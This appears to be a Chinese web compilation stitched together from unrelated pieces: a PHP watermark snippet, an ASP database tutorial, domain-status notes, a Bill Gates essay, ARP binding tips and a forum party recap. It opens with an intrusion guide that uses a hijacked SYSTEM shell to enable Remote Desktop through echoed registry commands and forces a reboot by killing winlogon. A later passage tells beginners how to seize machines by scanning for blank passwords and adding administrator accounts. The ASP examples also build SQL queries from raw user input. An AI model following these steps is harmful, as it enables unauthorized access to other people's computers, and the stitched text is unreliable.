今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,xp,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务。
一、win 2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard"Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。
一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!
比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)
winlogon.exe被关闭后机器立刻强制重启了
命令执行格式为ntsd -c q -p PID
那如何知道winlogon.exe的PID进程号呢~
以下这个脚本可以列举当前所有进程的PID:
wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next
在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:
echo wscript.echo "PID ProcessName">>1.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe
生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。
运行1.vbe得到如下运行结果:
C:\WINNT\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
PID ProcessName
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 KAVSvc.EXE
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 MSTask.exe
776 alter.exe
900 svchost.exe
916 WinMgmt.exe
1088 Dfssvc.exe
484 Explorer.EXE
1444 mdm.exe
1340 Server.exe
1224 ibguard.exe
1252 KAVSvcUI.EXE
1256 ibserver.exe
1336 internat.exe
1204 Uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe
从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马
上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~
二、winxp和win2003终端开启
开启的REG文件代码如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
用以下ECHO代码写一个REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了!用计算器转换吧。XP下不论开终端还是改终端端口都不需重启,真是太妙了~~呵呵。如果要关闭终闭只需把"fDenyTSConnections"=dword:00000000
改成"fDenyTSConnections"=dword:00000001
$wFile="a.jpg";//取得文件路径
$waterimg="hq.gif";//水印图片路径
if(in_array($wFile['type'], $uptypes))
{//检查文件类型,若上传的文件为jpg或gif图片则加水印
if(strstr($wFile['type'],"jp")){ //若上传图片类型为jpg,pjpeg,jpeg,则用imagecreatefromjpeg读取目标文件
$im = imageCreatefromjpeg($wFile);
$wfilew=imagesx($im);//取得图片的宽
$wfileh=imagesy($im);//取得图片的高
}else{//否则若上传图片类型为gif,则用imagecreatefromgif读取目标文件
$im = imageCreatefromgif($wFile);
$wfilew=imagesx($im);//取得图片的宽
$wfileh=imagesy($im);//取得图片的高
}
//设定混合模式
imagealphablending($im, true);
//读取水印文件
$im2 = imagecreatefromgif($waterimg);//若水印图片为jpg,则此去可改为$im2 = imagecreatefromjpeg($waterimg)
$waterw=imagesx($im2);//取得水印图片的宽
$waterh=imagesy($im2);//取得水印图片的高
//随机放水印到图片中
$randval = rand(0,9);//在0-9之间产生随机数
if($randval==0||$randval==3||$randval==2||$randval==8||$randval==7){//此处还可完善放更多位置
$wimgx=5;$wimgy=5;//放左上角
}else{
$wimgx=$wfilew-5-$waterw;$wimgy=$wfileh-5-$waterh;//放右上角
}
//拷贝水印到目标文件
imagecopy($im, $im2, $wimgx, $wimgy, 0, 0, $waterw,$waterh);
//输出图片
if(strstr($wFile['type'],"jp")){ //同上
imagejpeg($im,$wFile);
}else{
imagegif($im,$wFile);
}
imagedestroy($im);
imagedestroy($im2);
}
适合在网吧快速安装,调试程序。。
语句
……
%>
<2>定义变量dim语句
<%
dim a,b
a=10
b=”ok!”
%>
注意:定义的变量可以是数值型,也可以是字符或者其他类型的
<3>简单的控制流程语句
1. If 条件1 then
语句1
elseif 条件2 then
语句2
else
语句3
endif
2.while 条件
语句
wend
3.for count=1 to n step m
语句1
exit for
语句2
next
二.ASP数据库简单*作教程
<1>.数据库连接(用来单独编制连接文件conn.asp)
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath
("\bbs\db1\user.mdb")
%>
(用来连接bbs\db1\目录下的user.mdb数据库)
<2>显示数据库记录
原理:将数据库中的记录一一显示到客户端浏览器,依次读出数据库中的每一条记录
如果是从头到尾:用循环并判断指针是否到末 使用: not rs.eof
如果是从尾到头:用循环并判断指针是否到开始 使用:not rs.bof
<!--#include file=conn.asp--> (包含conn.asp用来打开bbs\db1\目录下的user.mdb数据
库)
<%
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表,即你要显示的
数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
rs.movefirst ---->(将指针移到第一条记录)
while not rs.eof ---->(判断指针是否到末尾)
response.write(rs("name")) ---->(显示数据表message中的name字段)
rs.movenext ---->(将指针移动到下一条记录)
wend ---->(循环结束)
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------
%>
其中response对象是服务器向客户端浏览器发送的信息
<3>增加数据库记录
增加数据库记录用到rs.addnew,rs.update两个函数
<!--#include file=conn.asp--> (包含conn.asp用来打开bbs\db1\目录下的user.mdb数据
库)
<%
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表,即你要显示的
数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
rs.addnew 新增加一条记录
rs("name")="xx" 将xx的值传给name字段
rs.update 刷新数据库
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------
%>
<4>删除一条记录
删除数据库记录主要用到rs.delete,rs.update
<!--#include file=conn.asp--> (包含conn.asp用来打开bbs\db1\目录下的user.mdb数据库)
<%
dim name
name="xx"
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表,即你要显示的
数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
-------------------------------------------------------
while not rs.eof
if rs.("name")=name then
rs.delete
rs.update 查询数据表中的name字段的值是否等于变量name的值"xx",如果符
合就执行删除,
else 否则继续查询,直到指针到末尾为止
rs.movenext
emd if
wend
------------------------------------------------------
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------
%>
<5>关于数据库的查询
(a) 查询字段为字符型
<%
dim user,pass,qq,mail,message
user=request.Form("user")
pass=request.Form("pass")
qq=request.Form("qq")
mail=request.Form("mail")
message=request.Form("message")
if trim(user)&"x"="x" or trim(pass)&"x"="x" then (检测user值和pass值是否为空,可以
检测到空格)
response.write("注册信息不能为空")
else
set rs=server.CreateObject("adodb.recordset")
sqlstr="select * from user where user='"&user&"'" (查询user数据表中的user字段其中
user字段为字符型)
rs.open sqlstr,conn,1,3
if rs.eof then
rs.addnew
rs("user")=user
rs("pass")=pass
rs("qq")=qq
rs("mail")=mail
rs("message")=message
rs.update
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("注册成功")
end if
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("注册重名")
%>
(b)查询字段为数字型
<%
dim num
num=request.Form("num")
set rs=server.CreateObject("adodb.recordset")
sqlstr="select * from message where id="&num (查询message数据表中id字段的值是否与
num相等,其中id为数字型)
rs.open sqlstr,conn,1,3
if not rs.eof then
rs.delete
rs.update
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("删除成功")
end if
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("删除失败")
%>
<6>几个简单的asp对象的讲解
response对象:服务器端向客户端发送的信息对象,包括直接发送信息给浏览器,重新定向URL,
或设置cookie值
request对象:客户端向服务器提出的请求
session对象:作为一个全局变量,在整个站点都生效
server对象:提供对服务器上方法和属性的访问
(a) response对象的一般使用方法
比如:
<%
resposne.write("hello, welcome to asp!")
%>
在客户端浏览器就会看到 hello, welcome to asp! 这一段文字
<%
response.Redirect("www.sohu.com")
%>
如果执行这一段,则浏览器就会自动连接到 “搜狐” 的网址
关于response对象的用法还有很多,大家可以研究研究
request对象的一般使用方法
比如客户端向服务器提出的请求就是通过request对象来传递的
列如 :你在申请邮箱的所填写的个人信息就是通过该对象来将
你所填写的信息传递给服务器的
比如:这是一段表单的代码,这是提供给客户填写信息的,填写完了按
“提交”传递给request.asp文件处理后再存入服务器数据库
<form name="form1" method="post" action="request.asp">
<p>
<input type="text" name="user">
</p>
<p>
<input type="text" name="pass">
</p>
<p>
<input type="submit" name="Submit" value="提交">
</p>
</form>
那么request.asp该如何将其中的信息读入,在写入数据库,在这里就要用到
request对象了,下面我们就来分析request.asp的写法
<%
dim name,password (定义user和password两个变量)
name=request.form(“user”) (将表单中的user信息传给变量name)
password=request.form(“pass”) (将表单中的pass信息传给变量password)
%>
通过以上的几句代码我们就将表单中的数据读进来了,接下来我们要做的就是将
信息写入数据库了,写入数据库的方法上面都介绍了,这里就不一一复述了。
(通过上面的学习大家完全可以自己做一个留言版了)
1:比如域名aaa.com到期时间为2003年03月01日;
2:从2003年03月02日开始,域名的ns将会被系统自动删除,域名无法解析,但我公司会继续保留该域名30天,用户可以在这30天的期限内续费;
3:如果在2所述的30天期限内没有续费,即从2003年03月31日开始,域名将变成RedemptionPeriod状态,该状态将会保持30天,在此期间该域名不会掉下来,但是除了restore命令以外的所有命令对此域名无效;
4:域名在RedemptionPeriod状态下可以restore回来,但每restore一次需要支付(折合)人民币1000元(含一年续费);
5:如果域名在RedemptionPeriod状态下的30天没有restore,从2003.04.29开始域名变成PendingDelete状态(5天),2003年04月04日该域名将会删除。
VeriSign于2003年1月在其Registry Whois (.COM和.NET)中加了3个字段:
Status、Creation Date、Expiration Date
其中 Status 目前发现有8种状态,分别是:
1、ACTIVE:活动状态。由Registry设置;该域名可以由Registrar更改;可以续费;至少被指派一个DNS。
2、REGISTRY-LOCK:注册局锁定。由注册局设置;该域名不可以由注册商更改、删除;必须由注册局解除此状态才可以由注册商更改域名信息;域名可以续费;如果域名被指派至少一个DNS则可以包含在(域名根服务器)的区域中(可以正常使用)。
3、REGISTRY-HOLD:注册局保留。由注册局设置;该域名不可以由注册商更改、删除;必须由注册局解除此状态才可以由注册商更改域名信息;域名可以续费;该域名不包括在(域名根服务器)的区域中(不能正常使用)。
4、REGISTRAR-LOCK:注册商锁定。由该域名的原始注册商设置;该域名不可以被更改或删除;必须由注册商解除此状态才可以更改域名信息;该域名可以续费。该域名包含在(域名根服务器)的区域中(可以正常使用)。
5、REGISTRAR-HOLD:注册商保留。由该域名的原始注册商设置;该域名不可以被更改或删除;必须由注册商解除此状态才可以更改域名信息;该域名可以续费。该域名不包括在(域名根服务器)的区域中(不能正常使用)。
6、REDEMPTIONPERIOD:宽限期。当注册商向注册局提出删除域名请求后,由注册局将域名设置称此状态,不过,条件是该域名已经注册了5天以上(如果该域名注册时间不足5天,则立即删除);该域名不包括在(域名根服务器)的区域中(不能正常使用);该域名不可以被更改或清除,只可以被恢复;任何其他注册商提出对此域名的更改或其他请求都将被拒绝;该状态最多保持30天。
7、PENDINGRESTORE:恢复未决。当注册商提出将处于REDEMPTIONPERIOD的域名恢复请求后,由注册局设置;该域名包含在(域名根服务器)的区域中(可以正常使用);注册商提出的更改或任何其他请求都将被拒绝;在7天之内,有注册商向注册局提供必需的恢复文件,如果注册商在7天之内提供了这些文件,该域名将被置为ACTIVE状态,否则,该域名将重新返回到REDEMPTIONPERIOD状态。
8、PENDINGDELETE:删除未决。如果一个域名在被设置成REDEMPTIONPERIOD状态期间内,注册商没有提出恢复请求,那么,域名将被置于PENDINGDELETE状态,注册商对此域名的任何请求都将被拒绝;5天之后清除。
然而,让人意想不到的是,这位世界首富没有自己的私人司机,公务旅行不坐飞机头等舱却坐经济舱,衣着也不讲究什么名牌;更让人不可思议的是,他还对打折商品感兴趣,不愿为泊车多花几美元……为这点“小钱”,如此斤斤计较,他是不是“现代的阿巴公(吝啬鬼)”?
可另一面的事实显示,比尔·盖茨并不是那种悭吝的守财奴———比如,微软员工的收入都相当高;比如,为公益和慈善事业一次次捐出大笔善款,他还表示要在自己的有生之年把95%的财产捐出去……
看来,这位世界首富跟那种“一掷万金、摆谱显阔”的富翁迥然有异。他是不是富者中的“另类”?他对金钱持有怎样的理念和规则?读了这篇文章,我们当会有所了解,或从中悟出些什么。
衣裳不求名牌 爱买打折商品
在美琳达刚踏入微软的时候,她就被告知,比尔是个非常特别的人。
确实比尔是一个与众不同的人,单从他对待金钱的态度上就可以看得出来。对他而言,创业是他人生的旅途,财富是他价值量化的标尺,他曾经说过:“我不是在为钱而工作,钱让我感到很累。”
“我只是这笔财富的看管人,我需要找到最合适的方式来使用它。”这就是比尔对金钱最真实的看法。
事实上,钱既不会改变他的生活,也不会使他从工作上分心。他经常告诉那些向他求经的朋友:“当你有了1亿美元的时候,你就会明白钱只不过是一种符号而已。”
比尔非常讨厌那些喜欢用钱摆阔气的人。他在杂志上发表自己的见解:“如果你已经习惯了过分享受,你将不能再像普通人那样生活,而我希望过普通人的生活。”
同所有企业家一样,比尔也在进行分散风险的投资,他除了拥有股票与债券外,还进行房地产投资,以及其他行业投资。虽然比尔是个经营天才,但是他从不认为自己的理财更胜一筹,所以他聘请了一位“金管家”———小他十多岁的劳森,比尔除了让他管理自己50亿美元的私人投资外,还让他管理比尔—美琳达慈善基金会的资金。
比尔总是告诉妻子,自己努力工作并不只是为了钱。对待这笔巨大的财富,他从没有想过要如何享用它们,相反在使用这些钱时却很慎重。他不喜欢因钱改变自己的本色,过着前呼后拥的生活,他更喜欢自由自在地独立与人交往。甚至见到熟人时,还像从前一样热情地与他们打招呼:“哦,你好,让我们去吃个热狗如何?”
在生活中,比尔也从不用钱来摆阔。一次,他与一位朋友前往希尔顿饭店开会,那次他们迟到了几分钟,所以没有停车位可以容纳他们的汽车。于是他的朋友建议将车停放在饭店的贵客车位。比尔不同意,他的朋友说:“钱可以由我来付。”
何为MAC地址
网卡在使用中有两类地址,一类是大家都熟悉的IP地址,另一类就是MAC地址,即网卡的物理地址,也称硬件地址或链路地址,这是网卡自身的惟一标识,就仿佛是我们的身份证一样,一般不能随意改变。它与网络无关,无论把这个网卡接入到网络的什么地方,MAC地址都是不变的。其长度为48位二进制数,由12个00 ~0FFH的16进制数组成,每个16进制数之间用“-”隔开,如“00-10-5C-AD-72-E3”。
如何查找MAC地址
1、在Windows 9x/2000/XP下单击“开始/程序”,找到“MS-DOS方式”或“命令提示符”。
2、在命令提示符下输入:“Ipconfig/all”,回车后出现如附图所示的对话框,其中的“Physical Address”即是所查的MAC地址。
如何捆绑MAC地址和IP地址
进入“MS-DOS方式”或“命令提示符”,在命令提示符下输入命令:ARP - s 10.88.56.72 00-10-5C-AD-72-E3,即可把MAC地址和IP地址捆绑在一起。
这样,就不会出现IP地址被盗用而不能正常使用校园网络的情况(当然也就不会出现错误提示对话框),可以有效保证校园网络的安全和用户的应用。
注意:ARP命令仅对局域网的上网代理服务器有用,而且是针对静态IP地址,如果采用Modem拨号上网或是动态IP地址就不起作用。ARP命令的各参数的功能如下:
ARP -s -d -a
-s:将相应的IP地址与物理地址的捆绑,如本文中的例子。
-d:删除相应的IP地址与物理地址的捆绑。
-a:通过查询ARP协议表显示IP地址和对应物理地址情况。
教你们个快速获得肉鸡的办法(针对菜鸟)
工具:WinntAutoAttack (使用很简单,如果连这个都琢磨不透我劝你还是别学了。)
SQL综合利用工具 (SQLTools)
用WinntAutoAttack扫描有漏洞的机器,打开前先关了你的杀毒软件和防火墙,还有如果是winxp pack2 换系统吧! 输入扫描ip开始和结束,选上3389 、 sql 、 空密码 三个选项,其他不选。
扫描出有3389和空密码的机器可是用远程桌面直接连接,有sql秘密为空的用SQL综合利用工具连接上用dos命令输入net user 帐户 密码 /add 这样就建立帐户 net localgroup Administrators 帐户 /add 这样就加如管理员组。下面就可以用你建的帐户用远程桌面登录如果对方是winxp的话你还是放弃吧!winxp只允许一个用户登录。你登录对方就会注销。
呵呵,我兄弟今天终于和她两个耍起了。。
我们现在正在寝室庆祝中。。
精英这次腐败活动成功举行。。
下面是出嫁在论坛发的总结帖子
第1楼:2004年论坛腐败活动成果总结会
开头照例形式化一哈:在大D英明的安排下,大家团结在以大D为首的党中央周围下,今天晚上的腐败活动行动圆满的画上句号,绝对没有逗号。。。。
现将今天晚上的战果汇报如下:
2004.12.11下午5点10分,大家非法聚会在工学院校门口。当时离校门只有0.0001公分,根据目击者言“我还以为FLG再现重工”
2004.12.11下午5点24分,ID们进行简单的自我介绍,大家都发出这样的声音“哦,你就是。。。。”。其乐融融。当我看见梅子兔的那一瞬间,我做出了我一生最失败的抉择,伸出了自己的右手“你好,我是看到你出嫁”,本来是趁机吃吃豆腐之类的,好象兔子明白我心思似的,面无表情点点头,又跟旁边的MM交流起来,全无我存在的意思,当时我只想自己的面前出现一把剪刀,我要。。。
2004.12.11下午6点整,全队共计35号人马雄赳赳,气敖敖的跨过鸭绿江。大有视死如归之说
2004.12.11晚8点15分腐败活动正式开始,在这里应该点名批评一下,6号座(就是1111111为席长的那一座先动筷子三分钟),具不知名人士透露,他们那一座大多都是没吃午饭而来的,在这里大家不要吝啬BS他们的语句,尽情批斗,如果说不清楚的,下次出来一定要喝清楚
20004.12.11晚8点半,大家发扬一个不能少的风格,终于等到迟来的雨中阳等一干人,碰了第一杯酒,腐败活动正式拉开序幕,在这里我应该自我批评一下,在开始不久我就喊了一句“小妹,拿碗饭过来,对于这样阳痿的男人,大家应该对我进行马克思理论教育
2004.12.11晚8点45分。D嫂活跃在各座之间,手拿数码咔嚓,咔嚓的记录着我们腐败每一证据,那一刻我们都停留在照片之间,许多年后保证你看见之后,会感慨万千,正是因为D嫂大方的使用数码的缘故,导致电池用完,不得不使论坛草草结局,没来一张大团员,成为本次聚会一大遗憾,大家记住D嫂是我们论坛第六次聚会的历史罪人。(最郁闷的是绿绿苹果绿绿拉MM摆了无数个POSS在我面前,因为电池原因终未果)
2004.12.11晚9时,在夜雨,无罪等人的带动下,开始纷纷敬酒,高潮出现,交杯酒也多次上演兄弟火锅,在一句句不解释的酒词中,千杯酒下肚。在这里应该点名表扬七夜JJ,轮翻敬酒,大有女中豪杰气势,当年的花木兰也不过是是战于千万男儿而扬名天下,而七夜MM是周旋于各大色狼之间而保持贞操不失,不容易啊。。。。。
2004.12.11晚9点14分,酒不在多,有情则行,菜不在好,填肚已可,看大家都高兴了,我英明的大手一挥,“撤”,各路大虾纷纷翩翩踏上回家之路。偶尔阵阵呕吐,惊起路边行人无数。在“88”声中,大家安全的回到寝室,清醒的正坐在电脑边,发泄着酒精的作用。而放爬的人已被“棒棒”免费送回狗窝,现在恐怕正做着南柯一梦。
今晚共消灭老山城啤酒5件,筷子无数,纸斤若干。花费RBM740大洋,为祖国刺激疲软经济,拉动内需。做出了不可磨灭的贡献。后多出5元,没人要,被我们烟鬼贪污天地一包。
放爬一人(雨中裸奔),喝高数人,大D肯定是在其中。最值得称赏的是111111,走到校门便来了个藏族的长头,(藏族人一种对神佛的礼仪,简称五体头地),让我们兄弟纷纷PF不已,在喝酒喝高之后,还能做出如此高难度的动作,的确难得可贵。
本次活动大家认识兄弟无数,姐妹若干。可以说是一次团结的,圆满的腐败活动。
特别要提出的是,在大会之后,无罪,夜雨,纷纷表态喝的不成功,需要再喝,为满足广大群众需要,我在关键时刻挺身而出,招呼夜雨到“联系111111咱们大盘鸡再喝”
111111果是梗直男,在电话结束后2分50秒的时候,跑步出现在我们的面前。精英四大水齐聚离后校门150米的新疆大盘鸡店。在一人干了一杯45度的狗己酒之后(听专家说喝了这玩意能步肾),觉得喝的还是不成功,于是移地再战,并拉出论坛神秘人物一朵花MM出来陪喝。111111在我们摧残下,终于英勇牺牲在串串店店,并呕吐肮脏之物若干,他终于执行了我的名言之一“做为一个男人应该爬在酒桌上”,他做了一个男人可不打紧,可苦了我和无罪两人,气喘西西的扶他回到猪圈。真他妈累
2004.12.11,0点1分,我回到寝室,宣告精英第6次外出腐败活动圆满的画上感叹号。
对今天晚上英勇牺牲的人们,说声“大家高兴就好”
对今天晚上有事不能来的ID,说声“希望下次能够在一起开心”
对今天晚上腐败活动做出贡献的人们,说声“辛苦你们了”
[ Last edited by 看到你出嫁 on 2004-12-12 at 05:10 ]
这次美中不足就是大D受伤了。。其实多厉害的。昨天晚上到现在姐姐、我、小B、袁轶都非常的累。
今天下午陪大D去了医院,打了针~~~呵呵,其实大D萎的时候很可爱。^_^·~~~~傻呼呼的。